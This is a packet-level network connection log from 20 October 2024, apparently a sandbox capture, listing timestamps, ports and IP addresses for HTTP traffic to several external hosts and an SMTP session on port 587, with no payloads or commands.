Oct 20, 2024 18:42:40.916223049 CEST	80	50002	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:40.970653057 CEST	50001	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:41.009874105 CEST	50003	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:41.014803886 CEST	80	50003	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:41.014895916 CEST	50003	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:41.015533924 CEST	50003	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:41.015533924 CEST	50003	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:41.020477057 CEST	80	50003	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:41.020570993 CEST	80	50003	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:41.924006939 CEST	80	50003	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:41.927145004 CEST	50003	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:41.929980040 CEST	50003	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:41.934989929 CEST	80	50003	44.213.104.86	192.168.2.4
Oct 20, 2024 18:42:42.221434116 CEST	50012	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:42.226288080 CEST	80	50012	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:42.226382971 CEST	50012	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:42.226692915 CEST	50012	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:42.226727009 CEST	50012	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:42.231584072 CEST	80	50012	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:42.231905937 CEST	80	50012	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:42.383753061 CEST	80	50002	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:42.385291100 CEST	50002	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:42.391407013 CEST	80	50002	54.244.188.177	192.168.2.4
Oct 20, 2024 18:42:42.391465902 CEST	50002	80	192.168.2.4	54.244.188.177
Oct 20, 2024 18:42:42.408821106 CEST	50013	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:42.413799047 CEST	80	50013	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:42.413878918 CEST	50013	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:42.414587975 CEST	50013	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:42.414902925 CEST	50013	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:42.419461966 CEST	80	50013	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:42.419847965 CEST	80	50013	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:43.126462936 CEST	80	50012	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:43.126638889 CEST	50012	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:43.129723072 CEST	50012	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:43.134772062 CEST	80	50012	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:43.188689947 CEST	50015	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:43.193829060 CEST	80	50015	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:43.193897009 CEST	50015	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:43.199693918 CEST	50015	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:43.199709892 CEST	50015	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:43.204679966 CEST	80	50015	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:43.204793930 CEST	80	50015	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:43.980231047 CEST	80	50013	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:43.980310917 CEST	50013	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:43.982760906 CEST	50013	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:43.988104105 CEST	80	50013	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:44.012536049 CEST	50020	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:44.017559052 CEST	80	50020	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:44.017677069 CEST	50020	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:44.018575907 CEST	50020	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:44.019069910 CEST	50020	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:44.023622036 CEST	80	50020	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:44.027461052 CEST	80	50020	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:44.096735001 CEST	80	50015	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:44.096788883 CEST	50015	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:44.096852064 CEST	50015	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:44.101777077 CEST	80	50015	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:44.364330053 CEST	50021	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:44.372016907 CEST	80	50021	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:44.372098923 CEST	50021	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:44.372375011 CEST	50021	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:44.372410059 CEST	50021	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:44.377626896 CEST	80	50021	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:44.377758980 CEST	80	50021	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:45.971501112 CEST	80	50021	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:45.974898100 CEST	50021	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:45.975028038 CEST	50021	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:45.981616020 CEST	80	50021	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:46.059194088 CEST	80	50020	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:46.062828064 CEST	50020	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:46.062899113 CEST	50020	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:46.068089962 CEST	80	50020	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:46.086369038 CEST	50029	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:46.092418909 CEST	80	50029	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:46.092477083 CEST	50029	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:46.097501993 CEST	50029	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:46.097518921 CEST	50029	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:46.098225117 CEST	50030	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:46.102411985 CEST	80	50029	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:46.103025913 CEST	80	50029	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:46.103892088 CEST	80	50030	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:46.106740952 CEST	50030	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:46.106863976 CEST	50030	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:46.106909037 CEST	50030	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:46.111862898 CEST	80	50030	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:46.111917019 CEST	80	50030	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:46.487596035 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:46.492523909 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:46.792924881 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:46.795173883 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:46.795895100 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:46.802570105 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:46.802889109 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:46.982290030 CEST	80	50029	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:46.982811928 CEST	50029	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:46.982851982 CEST	50029	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:46.985023975 CEST	50036	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:46.987777948 CEST	80	50029	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:46.990019083 CEST	80	50036	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:46.990097046 CEST	50036	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:46.990226030 CEST	50036	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:46.990248919 CEST	50036	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:46.994961977 CEST	80	50036	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:46.995292902 CEST	80	50036	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:47.158363104 CEST	80	49875	165.160.15.20	192.168.2.4
Oct 20, 2024 18:42:47.160737991 CEST	49875	80	192.168.2.4	165.160.15.20
Oct 20, 2024 18:42:47.160774946 CEST	49875	80	192.168.2.4	165.160.15.20
Oct 20, 2024 18:42:47.165610075 CEST	80	49875	165.160.15.20	192.168.2.4
Oct 20, 2024 18:42:47.635155916 CEST	80	50030	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:47.635210991 CEST	50030	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:47.637753010 CEST	50030	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:47.642570972 CEST	80	50030	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:47.882426023 CEST	80	50036	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:47.882757902 CEST	50036	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:47.882822990 CEST	50036	80	192.168.2.4	18.208.156.248
Oct 20, 2024 18:42:47.887562990 CEST	80	50036	18.208.156.248	192.168.2.4
Oct 20, 2024 18:42:47.928919077 CEST	50042	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:47.933815002 CEST	80	50042	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:47.936229944 CEST	50042	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:47.936541080 CEST	50042	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:47.936561108 CEST	50042	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:47.941416979 CEST	80	50042	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:47.941485882 CEST	80	50042	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:48.151285887 CEST	50043	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:48.156353951 CEST	80	50043	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:48.156425953 CEST	50043	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:48.156557083 CEST	50043	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:48.156583071 CEST	50043	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:48.161537886 CEST	80	50043	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:48.161561012 CEST	80	50043	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:48.219460011 CEST	49957	80	192.168.2.4	165.160.13.20
Oct 20, 2024 18:42:48.219489098 CEST	49976	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:48.225410938 CEST	80	49957	165.160.13.20	192.168.2.4
Oct 20, 2024 18:42:48.225650072 CEST	80	49976	208.100.26.245	192.168.2.4
Oct 20, 2024 18:42:48.225718975 CEST	49957	80	192.168.2.4	165.160.13.20
Oct 20, 2024 18:42:48.225728035 CEST	49976	80	192.168.2.4	208.100.26.245
Oct 20, 2024 18:42:48.383920908 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:48.386960030 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:48.391865969 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:48.698820114 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:48.698945999 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:48.703865051 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:48.840357065 CEST	80	50042	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:48.840734005 CEST	50042	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:48.840765953 CEST	50042	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:48.842813015 CEST	50047	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:48.845587015 CEST	80	50042	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:48.847619057 CEST	80	50047	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:48.847726107 CEST	50047	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:48.847824097 CEST	50047	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:48.847841978 CEST	50047	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:48.852829933 CEST	80	50047	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:48.852857113 CEST	80	50047	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:49.006536007 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:49.006860018 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:49.011732101 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:49.325181961 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:49.325196981 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:49.325202942 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:49.325253963 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:49.325289011 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:49.325335026 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:49.328406096 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:49.333408117 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:49.631992102 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:49.636902094 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:49.641808033 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:49.701769114 CEST	80	50043	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:49.701874018 CEST	50043	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:49.701937914 CEST	50043	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:49.706799984 CEST	80	50043	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:49.750237942 CEST	50052	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:49.755151033 CEST	80	50052	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:49.755211115 CEST	50052	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:49.755871058 CEST	50052	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:49.755872011 CEST	50052	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:49.760876894 CEST	80	50052	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:49.760901928 CEST	80	50052	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:49.769777060 CEST	80	50047	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:49.769828081 CEST	50047	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:49.769864082 CEST	50047	80	192.168.2.4	44.221.84.105
Oct 20, 2024 18:42:49.774842978 CEST	80	50047	44.221.84.105	192.168.2.4
Oct 20, 2024 18:42:49.782192945 CEST	50054	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:49.787113905 CEST	80	50054	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:49.787184954 CEST	50054	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:49.787297964 CEST	50054	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:49.787328005 CEST	50054	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:49.792057037 CEST	80	50054	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:49.792309999 CEST	80	50054	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:49.949623108 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:49.951627016 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:49.956583977 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:50.269957066 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:50.287806034 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:50.292999029 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:50.607213974 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:50.622407913 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:50.627356052 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:50.931355000 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:50.931550980 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:50.936455965 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.242587090 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.242783070 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.247756004 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.296948910 CEST	80	50052	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:51.299099922 CEST	50052	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:51.299170017 CEST	50052	80	192.168.2.4	13.251.16.150
Oct 20, 2024 18:42:51.304286957 CEST	80	50052	13.251.16.150	192.168.2.4
Oct 20, 2024 18:42:51.326930046 CEST	80	50054	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:51.326989889 CEST	50054	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:51.327099085 CEST	50054	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:51.332206964 CEST	80	50054	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:51.352065086 CEST	50060	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:51.357166052 CEST	80	50060	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:51.358779907 CEST	50060	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:51.358932018 CEST	50060	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:51.358963966 CEST	50060	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:51.364047050 CEST	80	50060	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:51.364116907 CEST	80	50060	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:51.551729918 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.555097103 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.555179119 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.555179119 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.555214882 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.556659937 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.560179949 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.560209990 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.560251951 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.560285091 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.560318947 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.560352087 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.561616898 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.561676979 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.561829090 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.561856031 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.561935902 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.562261105 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.562289000 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.562308073 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.562315941 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.562341928 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.562345982 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.562371016 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.562374115 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.562397003 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.562473059 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.565407038 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.565434933 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.566641092 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.566711903 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.566814899 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.566979885 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.566999912 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.567274094 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.567363024 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.567466974 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.567574024 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.567600965 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.567631006 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.567652941 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.567696095 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.567722082 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.567904949 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.571645021 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.571785927 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.571877003 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.571940899 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.571991920 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.572002888 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.572052956 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.572262049 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.572329998 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.572422028 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.572453022 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:51.572508097 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.572704077 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.572794914 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.572850943 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.572879076 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.572926044 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573041916 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573069096 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573095083 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573122025 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573257923 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573285103 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573312044 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573338032 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573364019 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573390961 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573416948 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573442936 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573467970 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.573493958 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577109098 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577142000 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577167988 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577194929 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577279091 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577306032 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577332020 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577358007 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577384949 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577411890 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577438116 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577464104 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577512026 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577538967 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577564955 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577590942 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577617884 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577645063 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577671051 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.577697039 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:51.675647020 CEST	50062	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:51.680643082 CEST	80	50062	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:51.680824041 CEST	50062	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:51.682789087 CEST	50062	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:51.682811975 CEST	50062	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:51.687726974 CEST	80	50062	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:51.687755108 CEST	80	50062	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:52.364412069 CEST	587	50035	51.195.88.199	192.168.2.4
Oct 20, 2024 18:42:52.484827042 CEST	50035	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:42:52.648947001 CEST	80	50062	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:52.654830933 CEST	50062	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:52.660646915 CEST	80	50062	34.211.97.45	192.168.2.4
Oct 20, 2024 18:42:52.660747051 CEST	50062	80	192.168.2.4	34.211.97.45
Oct 20, 2024 18:42:52.906017065 CEST	80	50060	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:52.906769037 CEST	50060	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:52.907551050 CEST	50060	80	192.168.2.4	18.141.10.107
Oct 20, 2024 18:42:52.912503004 CEST	80	50060	18.141.10.107	192.168.2.4
Oct 20, 2024 18:42:53.515099049 CEST	50070	80	192.168.2.4	44.213.104.86
Oct 20, 2024 18:42:53.520168066 CEST	80	50070	44.213.104.86	192.168.2.4
